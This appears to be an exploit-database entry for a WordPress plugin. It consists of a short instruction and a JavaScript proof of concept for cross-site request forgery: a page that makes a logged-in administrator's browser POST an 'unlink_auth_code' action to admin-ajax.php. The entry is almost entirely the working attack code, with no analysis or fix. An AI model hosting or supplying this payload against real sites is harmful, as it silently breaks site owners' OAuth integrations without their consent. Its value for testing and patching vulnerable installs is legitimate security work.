Share
## https://sploitus.com/exploit?id=WPEX-ID:4C1B0E5E-245A-4D1F-A561-E91AF906E62D
Make a logged in user visit a page with the following code

fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=dpt-oauth-ajax&call=unlink_auth_code',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));